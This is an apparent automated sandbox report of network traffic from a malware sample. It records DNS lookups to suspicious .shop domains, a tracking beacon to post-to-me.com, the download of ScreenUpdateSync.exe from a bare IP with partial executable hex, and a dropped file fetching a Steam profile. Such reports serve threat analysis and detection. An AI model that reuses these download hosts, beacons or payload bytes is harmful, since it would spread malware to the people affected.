                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662450075 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662453890 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662477016 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662496090 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662497044 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662496090 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662507057 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662518024 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662545919 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662545919 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662615061 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662616014 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662626028 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662636995 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662647009 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662657976 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662667990 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662667990 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662674904 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662683010 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662686110 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662695885 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662707090 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662718058 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662720919 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662729025 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662731886 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662763119 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662785053 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662796021 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662807941 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662817955 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662820101 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662820101 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662828922 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662839890 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662852049 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662867069 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662867069 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662895918 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662906885 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662908077 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662919044 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662930012 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662955999 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.662955999 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.663006067 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.385379076 CET49709443192.168.2.8104.102.49.254
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.385406971 CET44349709104.102.49.254192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.385559082 CET49709443192.168.2.8104.102.49.254
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.386744976 CET49709443192.168.2.8104.102.49.254
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.386756897 CET44349709104.102.49.254192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.028795004 CET44349709104.102.49.254192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.028868914 CET49709443192.168.2.8104.102.49.254
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.032023907 CET49709443192.168.2.8104.102.49.254
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.032031059 CET44349709104.102.49.254192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.032346964 CET44349709104.102.49.254192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.076814890 CET49709443192.168.2.8104.102.49.254
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.119323969 CET44349709104.102.49.254192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.515193939 CET44349709104.102.49.254192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.515223026 CET44349709104.102.49.254192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.515266895 CET49709443192.168.2.8104.102.49.254
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.515279055 CET44349709104.102.49.254192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.515288115 CET44349709104.102.49.254192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.515310049 CET44349709104.102.49.254192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.515331984 CET49709443192.168.2.8104.102.49.254
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.515372992 CET49709443192.168.2.8104.102.49.254
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.602828979 CET44349709104.102.49.254192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.602906942 CET44349709104.102.49.254192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.602925062 CET49709443192.168.2.8104.102.49.254
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.602977991 CET49709443192.168.2.8104.102.49.254
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.624185085 CET49709443192.168.2.8104.102.49.254
                                                                                                                                                                                                                              Jan 12, 2025 17:45:32.624192953 CET44349709104.102.49.254192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:33.457402945 CET8049708176.113.115.19192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:33.457556963 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:47:16.351268053 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:47:16.726423979 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:47:17.493304014 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:47:18.788592100 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:47:21.290585041 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:47:26.179222107 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:47:35.790165901 CET4970880192.168.2.8176.113.115.19
                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              Jan 12, 2025 17:45:26.378144026 CET5591553192.168.2.81.1.1.1
                                                                                                                                                                                                                              Jan 12, 2025 17:45:26.393179893 CET53559151.1.1.1192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.108089924 CET5967853192.168.2.81.1.1.1
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.119301081 CET53596781.1.1.1192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.124281883 CET5924653192.168.2.81.1.1.1
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.133523941 CET53592461.1.1.1192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.137038946 CET5747553192.168.2.81.1.1.1
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.218291044 CET53574751.1.1.1192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.223941088 CET6068353192.168.2.81.1.1.1
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.234154940 CET53606831.1.1.1192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.236473083 CET4954753192.168.2.81.1.1.1
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.245474100 CET53495471.1.1.1192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.246922016 CET5687253192.168.2.81.1.1.1
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.329444885 CET53568721.1.1.1192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.332885981 CET5881353192.168.2.81.1.1.1
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.342232943 CET53588131.1.1.1192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.345371962 CET6047053192.168.2.81.1.1.1
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.354676008 CET53604701.1.1.1192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.357464075 CET5938853192.168.2.81.1.1.1
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.368055105 CET53593881.1.1.1192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.371115923 CET5166853192.168.2.81.1.1.1
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.379141092 CET53516681.1.1.1192.168.2.8
                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                              Jan 12, 2025 17:45:26.378144026 CET192.168.2.81.1.1.10x207cStandard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.108089924 CET192.168.2.81.1.1.10xc699Standard query (0)skidjazzyric.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.124281883 CET192.168.2.81.1.1.10xbb43Standard query (0)soundtappysk.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.137038946 CET192.168.2.81.1.1.10xa5acStandard query (0)femalsabler.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.223941088 CET192.168.2.81.1.1.10x6408Standard query (0)apporholis.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.236473083 CET192.168.2.81.1.1.10x6de3Standard query (0)crowdwarek.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.246922016 CET192.168.2.81.1.1.10x7e21Standard query (0)versersleep.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.332885981 CET192.168.2.81.1.1.10x8885Standard query (0)chipdonkeruz.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.345371962 CET192.168.2.81.1.1.10x6963Standard query (0)handscreamny.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.357464075 CET192.168.2.81.1.1.10x1f16Standard query (0)robinsharez.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.371115923 CET192.168.2.81.1.1.10xce61Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                              Jan 12, 2025 17:45:26.393179893 CET1.1.1.1192.168.2.80x207cNo error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:26.393179893 CET1.1.1.1192.168.2.80x207cNo error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.119301081 CET1.1.1.1192.168.2.80xc699Name error (3)skidjazzyric.clicknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.133523941 CET1.1.1.1192.168.2.80xbb43Name error (3)soundtappysk.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.218291044 CET1.1.1.1192.168.2.80xa5acName error (3)femalsabler.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.234154940 CET1.1.1.1192.168.2.80x6408Name error (3)apporholis.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.245474100 CET1.1.1.1192.168.2.80x6de3Name error (3)crowdwarek.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.329444885 CET1.1.1.1192.168.2.80x7e21Name error (3)versersleep.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.342232943 CET1.1.1.1192.168.2.80x8885Name error (3)chipdonkeruz.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.354676008 CET1.1.1.1192.168.2.80x6963Name error (3)handscreamny.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.368055105 CET1.1.1.1192.168.2.80x1f16Name error (3)robinsharez.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 12, 2025 17:45:31.379141092 CET1.1.1.1192.168.2.80xce61No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              • post-to-me.com
                                                                                                                                                                                                                              • steamcommunity.com
                                                                                                                                                                                                                              • 176.113.115.19
                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              0192.168.2.849708176.113.115.19803684C:\Users\user\Desktop\lBb4XI4eGD.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              Jan 12, 2025 17:45:27.434415102 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                                                                                                                                                                              User-Agent: ShareScreen
                                                                                                                                                                                                                              Host: 176.113.115.19
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.090116978 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 12 Jan 2025 16:45:27 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                              Last-Modified: Sun, 12 Jan 2025 16:45:01 GMT
                                                                                                                                                                                                                              ETag: "62a00-62b850c908464"
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Content-Length: 403968
                                                                                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ec be f9 b4 a8 df 97 e7 a8 df 97 e7 a8 df 97 e7 b6 8d 13 e7 89 df 97 e7 b6 8d 02 e7 bc df 97 e7 b6 8d 14 e7 c4 df 97 e7 8f 19 ec e7 ab df 97 e7 a8 df 96 e7 d9 df 97 e7 b6 8d 1d e7 a9 df 97 e7 b6 8d 03 e7 a9 df 97 e7 b6 8d 06 e7 a9 df 97 e7 52 69 63 68 a8 df 97 e7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 f9 fd 95 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 36 04 00 00 70 08 00 00 00 00 00 b7 14 00 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 0c 00 00 04 00 00 02 17 07 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$RichPELf6pP@i(iP.text46 `.rdataV"P$:@@.data|^@.nosuSHt@.muwavZ`@.roxahp@@.rsrcij@@
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.090193033 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 04 80 44 00 75 02 f3 c3 e9 b2 04 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 29 06 00 00 8b
                                                                                                                                                                                                                              Data Ascii: ;DuUQeVEPuu)u9EttM^USVuF3u@t9FW>+~,WPVYP;uFyFN _Ff^[]UVuuV5Y
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.090245008 CET1236INData Raw: b8 ff 00 00 00 e8 87 0f 00 00 c3 e8 7f 36 00 00 e9 78 fe ff ff 8b ff 55 8b ec 81 ec 28 03 00 00 a3 98 95 44 00 89 0d 94 95 44 00 89 15 90 95 44 00 89 1d 8c 95 44 00 89 35 88 95 44 00 89 3d 84 95 44 00 66 8c 15 b0 95 44 00 66 8c 0d a4 95 44 00 66
                                                                                                                                                                                                                              Data Ascii: 6xU(DDDD5D=DfDfDfDf|Df%xDf-tDDEDEDEDDDDDDDDPDDjC6YjPDhQD
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.090281010 CET672INData Raw: 0f 84 8d 04 00 00 33 c0 50 50 6a 05 8d 4d f4 51 6a 01 8d 8d 40 e5 ff ff 51 50 ff b5 1c e5 ff ff 43 ff 85 44 e5 ff ff ff 15 b0 50 44 00 8b f0 85 f6 0f 84 5c 04 00 00 6a 00 8d 85 3c e5 ff ff 50 56 8d 45 f4 50 8b 85 28 e5 ff ff 8b 00 ff 34 07 ff 15
                                                                                                                                                                                                                              Data Ascii: 3PPjMQj@QPCDPD\j<PVEP(4PD)D09<8 j<PjEP(E4PD<08<t<u!33fCCD
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.090315104 CET1236INData Raw: 2b 8d 34 e5 ff ff 8d 85 48 e5 ff ff 3b 4d 10 73 46 8b 95 44 e5 ff ff 83 85 44 e5 ff ff 02 0f b7 12 41 41 66 83 fa 0a 75 16 83 85 30 e5 ff ff 02 6a 0d 5b 66 89 18 40 40 83 85 3c e5 ff ff 02 83 85 3c e5 ff ff 02 66 89 10 40 40 81 bd 3c e5 ff ff fe
                                                                                                                                                                                                                              Data Ascii: +4H;MsFDDAAfu0j[f@@<<f@@<rH+j,PSHP4PDb,8;ZD+4;E?@9M|D<+4jH^;Ms<DDfu
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.090348005 CET224INData Raw: 7e 04 01 74 0d 57 ff d3 57 e8 fc 3c 00 00 83 26 00 59 83 c6 08 81 fe a0 82 44 00 7c dc be 80 81 44 00 5f 8b 06 85 c0 74 09 83 7e 04 01 75 03 50 ff d3 83 c6 08 81 fe a0 82 44 00 7c e6 5e 5b c3 8b ff 55 8b ec 8b 45 08 ff 34 c5 80 81 44 00 ff 15 c4
                                                                                                                                                                                                                              Data Ascii: ~tWW<&YD|D_t~uPD|^[UE4DPD]jhfD3G}39DujMhYYu4D9tnj<Y;ue3QjYY]9u,hW;YYuW*<
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.090377092 CET1236INData Raw: 59 e8 2f f4 ff ff c7 00 0c 00 00 00 89 5d e4 eb 0b 89 3e eb 07 57 e8 0f 3c 00 00 59 c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 39 02 00 00 c3 6a 0a e8 28 ff ff ff 59 c3 8b ff 55 8b ec 8b 45 08 56 8d 34 c5 80 81 44 00 83 3e 00 75 13 50 e8 22
                                                                                                                                                                                                                              Data Ascii: Y/]>W<YEE9j(YUEV4D>uP"YujY6PD^]DJVj^u;}JjPc<YYJujV5JJ<YYJujX^3DJ D|j^3DW
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.090426922 CET1236INData Raw: 0c ff ee ff ff 83 66 18 00 83 26 00 83 66 08 00 59 5e 5d c3 8b ff 55 8b ec 8b 45 08 56 8b f1 c6 46 0c 00 85 c0 75 63 e8 61 21 00 00 89 46 08 8b 48 6c 89 0e 8b 48 68 89 4e 04 8b 0e 3b 0d 68 8c 44 00 74 12 8b 0d 84 8b 44 00 85 48 70 75 07 e8 43 45
                                                                                                                                                                                                                              Data Ascii: f&fY^]UEVFuca!FHlHhN;hDtDHpuCEF;DtFDHpu=FF@puHpF@F^]A@tyt$IxQPLEYYuUVMEM>t}^]
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.090461969 CET448INData Raw: ff e8 c2 2d 00 00 59 85 c0 8a 85 ef fd ff ff 59 74 22 8b 8d b4 fd ff ff 8d b5 d8 fd ff ff e8 a4 fb ff ff 8a 03 43 89 9d c4 fd ff ff 84 c0 0f 84 a4 fc ff ff 8b 8d b4 fd ff ff 8d b5 d8 fd ff ff e8 82 fb ff ff e9 4d 07 00 00 0f be c2 83 f8 64 0f 8f
                                                                                                                                                                                                                              Data Ascii: -YYt"CMdySAtHHtXHHtHH @9H00
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.090497017 CET1236INData Raw: ff ff c7 85 e0 fd ff ff 01 00 00 00 8d 85 f4 fd ff ff 89 85 e4 fd ff ff e9 35 04 00 00 8b 07 83 c7 04 89 bd dc fd ff ff 3b c6 74 3b 8b 48 04 3b ce 74 34 f7 85 f0 fd ff ff 00 08 00 00 0f bf 00 89 8d e4 fd ff ff 74 14 99 2b c2 d1 f8 c7 85 c8 fd ff
                                                                                                                                                                                                                              Data Ascii: 5;t;H;t4t+ DP@Ypeg4itqnt(otaU7/ tf
                                                                                                                                                                                                                              Jan 12, 2025 17:45:28.095350981 CET1236INData Raw: bd b4 fd ff ff 8d 85 d8 fd ff ff 8d 8d d4 fd ff ff e8 76 f5 ff ff f6 85 f0 fd ff ff 08 59 74 1b f6 85 f0 fd ff ff 04 75 12 57 53 6a 30 8d 85 d8 fd ff ff e8 2e f5 ff ff 83 c4 0c 83 bd c8 fd ff ff 00 8b 85 e0 fd ff ff 74 66 85 c0 7e 62 8b b5 e4 fd
                                                                                                                                                                                                                              Data Ascii: vYtuWSj0.tf~bPjEPFPF=u(9t MYuPY|tWSj t


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              0192.168.2.849707172.67.179.2074433684C:\Users\user\Desktop\lBb4XI4eGD.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2025-01-12 16:45:26 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                                                                                                                                                                              User-Agent: ShareScreen
                                                                                                                                                                                                                              Host: post-to-me.com
                                                                                                                                                                                                                              2025-01-12 16:45:27 UTC808INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 12 Jan 2025 16:45:27 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BhlMYg6hEZfU%2BYG8CLHo12wH2n%2BBkcn%2FevvtX9wtcIGeHM%2FZZ7nbc5jUziaz4lstVQzvXhcQ8%2FUjGJTzB0zWDr30werynrq9rV60s509lDBBb5HxEJRXHxnCg%2BcYjZNfPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 900e9df3c8e2c335-EWR
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1607&rtt_var=641&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=728&delivery_rate=1657207&cwnd=165&unsent_bytes=0&cid=f28013e8983615e2&ts=379&x=0"
                                                                                                                                                                                                                              2025-01-12 16:45:27 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                              2025-01-12 16:45:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              1192.168.2.849709104.102.49.2544434052C:\Users\user\AppData\Local\Temp\E6F4.tmp.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2025-01-12 16:45:32 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Host: steamcommunity.com
                                                                                                                                                                                                                              2025-01-12 16:45:32 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Date: Sun, 12 Jan 2025 16:45:32 GMT
                                                                                                                                                                                                                              Content-Length: 25665
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Set-Cookie: sessionid=b2836c4de18c57dea14fd299; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                              Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
